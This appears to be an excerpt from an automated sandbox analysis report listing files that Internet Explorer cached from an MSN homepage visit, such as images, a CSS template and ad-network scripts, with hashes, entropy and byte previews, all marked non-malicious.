Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	downloaded
Size (bytes):	6509
Entropy (8bit):	7.916373599385713
Encrypted:	false
SSDEEP:	192:BCvmf6MVw/8xFnj03D4NuomJRce5eA8WNek:kC69ExlIT4NuDJuoXr
MD5:	8D8B11C69A16881AF20C175003D6786C
SHA1:	00FAC4C5116FF0DF4BCD3DDDC0E8F90444C5B90E
SHA-256:	471DF3E993D43A9B703B9E894887B31DC74DB08DCF2EEC6B4018D282C74FAE39
SHA-512:	7EDAF374887F04797599F1BA2ABF884B0C6A99A468446087E72887FCB01FA7FD5F1FBAFF84D3B79988C1B6524EE8855EB3B77F5DA16CC4F1A0E2C4AD08928C8C
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dyt6T.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=512&y=341
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..m4.0q[6.q.Og..$V.h..(.("......d.``.......f!.jB..Q..:.k.....Q)X....@.z.ig.[..p1Ll..#mN.w.<.........+...{.....(...my.e..2H..a.5...9<.y.K.OQ.{..:.$...0.cR[....1..OH. .......[....4&... a....Y.Z.[f........H.3.........O@...-4d<q.....g>..HI..dg.jit..s$.......*......e...g.LF....#..J.. .....1.f)...@3.f.+.B.Ke/....>...+...L..Gn.....1.........q.# ..\..A...;....K{

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB7hjL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	444
Entropy (8bit):	7.25373742182796
Encrypted:	false
SSDEEP:	6:6v/lhPkR/CnFFDDRHbMgYjEr710UbCO8j+qom62fke5YCsd8sKCW5biVp:6v/78/kFFlcjEN0sCoqoX4ke5V6D+bi7
MD5:	D02BB2168E72B702ECDD93BF868B4190
SHA1:	9FB22D0AB1AAA390E0AFF5B721013E706D731BF3
SHA-256:	D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
SHA-512:	6A801305D1D1E8448EEB62BC7062E6ED7297000070CA626FC32F5E0A3B8C093472BE72654C3552DA2648D8A491568376F3F2AC4EA0135529C96482ECF2B2FD35
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBOLLMj[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	507
Entropy (8bit):	7.140014669230146
Encrypted:	false
SSDEEP:	12:6v/78/soC6yG9YjUiWGS3Sw38Cztj2ChFblexnDizTGN:RCMnX3fxzhhqxn8TGN
MD5:	25D424F126A464CA028C0C9BA692ADA9
SHA1:	E54F845D1099C8D7B7BA0C5E9B57DFA7163CE95C
SHA-256:	E0DF9CDAFF2557C7B555FFAED40B7E553FF6C50DD58FE79C27B3AA69CC56258D
SHA-512:	7E72F13B354AA5EE99EC50057DB2BFBC35A78D5617A36ED90864D1DA6AC1B692301115EF8F44255AB3894142D6C0F634A2CFD44EBCD00B039DC628F751579DC3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBOLLMj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8Oc.v.............g8......'.......X].............l.....z..]\.\|d...i5U`.,,,......~.f.+-ax..5T..`....S.M{......d..w?...1..?..Vo...G....>z.L...2..10222.::1...1....,..0.........``b.HgFE3<;z..,5..G.,P...........t..Y._.}...TT..}.l..0..j......%..^.{.f.9;c....aAA0...w0]....ag.fc...(HK...>0....!=".AMQ.,..`......y...8.a....k.D..`..J8..!`....\|.R...@S.,..0...&..2...0.8t.....yq..B...Wo..@...F..........ks.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	downloaded
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	688
Entropy (8bit):	7.578207563914851
Encrypted:	false
SSDEEP:	12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
MD5:	09A4FCF1442AD182D5E707FEBC1A665F
SHA1:	34491D02888B36F88365639EE0458EDB0A4EC3AC
SHA-256:	BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
SHA-512:	2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................U....sRGB.........gAMA......a.....pHYs..........o.d...EIDATHK.Mh.A......4.....b.Zoz....z.".....A../.X.../........"(.A.(.qPAK/......I.Yw3...M...z./...7..}o...~u'...K_...YM...5w1b....y.V.\|.-e.i..D...[V.J...C......R.QH.....:....U.....].$]LE3.}........r..#.]...MS.....S..#..t1...Y...g........ 8."m......Q..>,.?S..{.(7.....;..I.w...?MZ..>.......7z.=.@.q@.;.U..~....:.[.Z+3UL#.........G+3.=.V."D7...r/K.._..LxY.....E..$..{. sj.D...&.......{.rYU..~G....F3..E...{. ......S....A.Z.f<=.....'.1ve.2}[.....C....h&....r.O..c....u... .N_.S.Y.Q~.?..0.M.L..P.#...b..&..5.Z....r.Q.zM'<...+.X3..Tgf._...+SS...u........./.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBnYSFZ[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	560
Entropy (8bit):	7.425950711006173
Encrypted:	false
SSDEEP:	12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
MD5:	CA188779452FF7790C6D312829EEE284
SHA1:	076DF7DE6D49A434BBCB5D88B88468255A739F53
SHA-256:	D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\auction[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	25716
Entropy (8bit):	5.6789188861836735
Encrypted:	false
SSDEEP:	384:jdGjQvl2HFdNAD3l2jplxr3l2Y1dNlnYsQRGDGlnzeNBDlnEsS7n0clN1pXROsls:HdC1c1OB/Jd+mbEvJ5YsxULZaNy
MD5:	9B3743A8307C3E7D48CFB4A0BD8BF072
SHA1:	8BE579B3A7B98BB343B82F6508BE741DECFDD53F
SHA-256:	ABCB1E2F4ED073BAC75B4522A379D15DC7911AF5FAB624B843863610FAD4B017
SHA-512:	CBF82B1E676631B1CE5C65A4AF80568D2A134AE369C64BBD1CB29DEF08AB07EC6071C5326250C5100B3BABB5F29FCAF1A06A4FECC7CC2DD9AD4169679E51FBCD
Malicious:	false
IE Cache URL:	https://srtb.msn.com/auction?a=de-ch&b=fe97b5b9dd8e47899b42f75f1a907c33&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1612940400777
Preview:	.<script id="sam-metadata" type="text/html" data-json="{"optout":{"msaOptOut":false,"browserOptOut":false},"taboola":{"sessionId":"v2_4fc197396e21ee404d8deeff74626684_949ef371-4ebf-4022-bc1d-a90ae50993e6-tuct71d09f4_1612940404_1612940404_CIi3jgYQr4c_GMCgsubikZexyQEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE"},"tbsessionid":"v2_4fc197396e21ee404d8deeff74626684_949ef371-4ebf-4022-bc1d-a90ae50993e6-tuct71d09f4_1612940404_1612940404_CIi3jgYQr4c_GMCgsubikZexyQEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgE","pageViewId":"fe97b5b9dd8e47899b42f75f1a907c33","RequestLevelBeaconUrls":[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{"tvb":[],"trb":[],"tjb":[],"p":"taboola","e":true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301493036290279
Encrypted:	false
SSDEEP:	384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
MD5:	72C1F1F3F129C727E7B71E4873CC2B9F
SHA1:	18352C21C278361D11A7C9536A0B65CE08DE44CC
SHA-256:	C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
SHA-512:	B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301493036290279
Encrypted:	false
SSDEEP:	384:RpAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:386qhbz2RmF3OssQWwY4RXrqt
MD5:	72C1F1F3F129C727E7B71E4873CC2B9F
SHA1:	18352C21C278361D11A7C9536A0B65CE08DE44CC
SHA-256:	C9B5A016306FD45301DC8F69359D1B1C983F6661F22990A72EF15026FC334BBF
SHA-512:	B58D34ACDFA63F54E3C47C76B2E9A3F7789FB07087846A15535BBD9472FC44D74576005783DFA50057D320D351D2B82BD05DF8126D9444EB06F37D10E6822A0D
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\http___cdn.taboola.com_libtrc_static_thumbnails_64879b5062065d050d314dd3ca506f0a[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	44495
Entropy (8bit):	7.973503134497021
Encrypted:	false
SSDEEP:	768:HQcVRpGKc95SQ0SOFNCcLyApZVJ81sn6DCQhOb4oi+BTVi2k4PW1xioWN35YF:RBdc/SQEFQcA1+jco/k1xifNy
MD5:	0495A464281FEE3EFD033C1E40ADE8F2
SHA1:	C2B99A52A770B09F775D3EB606CD1DD1ACFEBAF9
SHA-256:	9A2DF397449989900209A02C629FECE70D2D1FB94951FDAC77842D43FE121D6D
SHA-512:	E15FDAE857938F3D79DB92E3988C614FA7332B2442AE149F8A41646E227874453600A1F9A5F39E4D738C3DF72D7B7FA88CCCA756FEFA9E8D5C78641BC0B8DA31
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_492%2Cy_321/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F64879b5062065d050d314dd3ca506f0a.jpg
Preview:	......JFIF.............$ICC_PROFILE.......appl....mntrRGB XYZ .........7.6acspAPPL....APPL...........................-applc.....1.;;B..u.................................desc.......fcprt...d...#wtpt........rXYZ........gXYZ........bXYZ........rTRC........chad.......,bTRC........gTRC........desc........BenQ GL2760.................................................................................text....Copyright Apple Inc., 2020..XYZ .......R........XYZ ......o...8.....XYZ ......b.........XYZ ......$.........para............sf32.......?.......(.......................y...........................................................&""&0-0>>T.............................................$ $.5--5@99@QMQjj.......7...............7........................................................................D.4.=.p.."...=.}.1.U#,U..@f.k.....]..^.Yh./.... .E....A.Wr..RH.^...T..:T...Z>}j.uK.r.........?+.U>...../E-......d.P.#....!.x..D..N....'$.Z.Y... .;.E.]._.].].......w<....<#/...(1d.p.xt."

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	19305
Entropy (8bit):	7.967008425870337
Encrypted:	false
SSDEEP:	384:aYxPiSRWO/FDL2coduthmS3d/3dcxP6dP4/aZrogHt:aZ4nFL2coEthmSN/3dct6b
MD5:	30939BEFE688393E77D9FB1A40332FD2
SHA1:	3BCDE0BBB03ECE8F53A29583880E1EA598563969
SHA-256:	0A74990CF6E3033D3280EFF2A5506AB940B1DF6F48AF49011164129D5B7EEEE0
SHA-512:	74966474BB18F8B0F4808B66985F9FF1EB560AAEC83D3255797EB3D5A85E4ED09994E15B0D6FE4A83CC3F64E2C3F0305DEA296D9B5924536EB1A2619571186DF
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e.png
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........6....................................................................z.......&jgvd..VC...p..E..Y..zb..p....w 3..1k..t.Q.5.^\M9..q.Vl..'.b8e.{Q........Hy..:.%KB\.,?...g.`.}.&v..JnJ..]VL..q..^........[.=..xu,.....jp..P...:`Lk..."..I...R.......b.Xzi........N.wUR....w..<......"..d.#W..LJ...".C.....ZH.j.u.:h....K..q.Oq.^Pj...){x.o.i...^.%..\.;..?..Gcy.=M....q.....e..e,)./.@.$....}.4W......z...!].y.d6.Y......v!P.......i.0..f.\.J..,@W...%Zl.q&.J...o.Qgx..^....Z.\|.G......Z*.P&f....v...d."...l...2T.Z<.}....W..5..I#C)FMS...G.......G.....;.Xm2....Y.B:.......O...y.!...$dt......M...3d...r....?fIN....Y...F./2...DK.N..4oJ'b...,...Z....[i....zt....S...... 2.w.-..dJ.\|.k..zV..U....<bc(..T3..v..n.}...UItK.n..w..u.......Z.d...<...G.t6......v8..$G.......rL.~.....ui.\.....gk....Ek>mS.%...A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	382409
Entropy (8bit):	5.485041279553666
Encrypted:	false
SSDEEP:	6144:4g29Tw5qIZvbBH0m9Z3GCVvgz56Cu1bEa3Cv4IW:kIZvdP3GCVvg4xVz3E4IW
MD5:	FE0D031719B74572B78AD7309BB58760
SHA1:	9FA7A1146F9FDDB3B6D662FBE2578062242DFF41
SHA-256:	6D2A319ABF1D0F13E60C4DA53AFCAC3C88D0DB9BC09C953087203B83482783A6
SHA-512:	DB6B3D457435D75D233192572BE2E980D6299260E0E7481557897F207958C708F2EABAD1904A006B105A09F69649C99FA27694E6C7FC4483333537C675821D4F
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	382408
Entropy (8bit):	5.485032449637103
Encrypted:	false
SSDEEP:	6144:4g29Tw5qIZvbBH0m9Z3GCVvgz56Cu1bEa3Cv4IW:kIZvdP3GCVvg4xVz3E4IW
MD5:	CFDA5A7035DB6E17E66312ADCABBF188
SHA1:	618C0D9F4C57756105EE0FB1C3E97FBA9B7CBC93
SHA-256:	EE9070904AF699A3E114B34203A4C65CD5F2D79078533973BC9983962DAAAD25
SHA-512:	E54A26577FC9A1C1F6343C80C051DF51A1F7BCA889BE14837AE236583745B9B4AFD88A3BBB922BE1F3EC00E51A651BFF98D433746461CF2A861DD2968A922275
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl\|\|"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON\|\|"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\39ab3103-8560-4a55-bfc4-401f897cf6f2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	64434
Entropy (8bit):	7.97602698071344
Encrypted:	false
SSDEEP:	1536:uvrPk/qeS+g/vzqMMWi/shpcnsdHRpkZRF+wL7NK2cc8d55:uvrsSb7XzB0shpOWpkThLRyc8J
MD5:	F7E694704782A95060AC87471F0AC7EA
SHA1:	F3925E2B2246A931CB81A96EE94331126DEDB909
SHA-256:	DEEBF748D8EBEB50F9DFF0503606483CBD028D255A888E0006F219450AABCAAE
SHA-512:	02FEFF294B6AECDDA9CC9E2289710898675ED8D53B15E6FF0BB090F78BD784381E4F626A6605A8590665E71BFEED7AC703800BA018E6FE0D49946A7A3F431D78
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
